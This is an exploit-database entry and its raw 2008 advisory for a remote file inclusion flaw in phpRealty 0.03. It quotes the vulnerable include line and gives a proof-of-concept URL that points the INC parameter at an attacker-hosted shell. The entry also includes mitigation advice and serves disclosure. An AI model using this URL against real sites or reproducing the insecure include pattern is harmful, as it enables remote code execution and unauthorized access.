header-logo
Suggest Exploit
vendor:
phpRealty
by:
ka0x
9.3
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: phpRealty
Affected Version From: 0.03
Affected Version To: 0.03
Patch Exists: NO
Related CWE: N/A
CPE: a:phprealty:phprealty
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

phpRealty <= 0.03 (INC) Remote File Inclusion Vulnerability

phpRealty is prone to a remote file-inclusion vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this issue to execute arbitrary PHP code within the context of the vulnerable application. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized. Additionally, applications should avoid including files from external, user-supplied sources.
Source

Exploit-DB raw data:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
phpRealty <= 0.03 (INC) Remote File Inclusion Vulnerability
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

$ Script: phpRealty
$ Version: <= 0.03
$ File affected: manager/static/view.php
$ Download: http://sourceforge.net/project/showfiles.php?group_id=204745


Found by ka0x <ka0x01 [at] gmail [dot] com>
D.O.M Labs - Security Researchers
- www.domlabs.org


vuln code:

-------------

11:	if(!isset($_GET['propID']) || !is_numeric($_GET['propID']) || empty($_GET['propID'])){
13:	return;


17:	include($INC."curr_conv.class.php");   // -------->>> Vuln Line!!
                                          // the var $INC isn't declared

-------------


Proof of Concept:
http://[host]/[phprealty-path]/manager/static/view.php?propID=0&INC= [ S H E L L ] ?


__EOF__

# milw0rm.com [2008-09-17]